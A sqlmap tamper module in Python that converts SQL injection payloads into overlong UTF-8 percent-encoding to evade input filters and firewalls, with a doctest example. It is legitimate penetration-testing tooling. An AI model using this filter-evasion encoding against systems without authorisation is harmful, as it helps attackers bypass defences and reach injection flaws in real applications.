1#!/usr/bin/env python 2 3""" 4Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) 5See the file 'LICENSE' for copying permission 6""" 7 8import string 9 10from lib.core.enums import PRIORITY 11 12__priority__ = PRIORITY.LOWEST 13 14def dependencies(): 15 pass 16 17def tamper(payload, **kwargs): 18 """ 19 Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) 20 21 Reference: 22 * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ 23 * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ 24 25 >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') 26 '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' 27 """ 28 29 retVal = payload 30 31 if payload: 32 retVal = "" 33 i = 0 34 35 while i < len(payload): 36 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: 37 retVal += payload[i:i + 3] 38 i += 3 39 else: 40 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) 41 i += 1 42 43 return retVal 44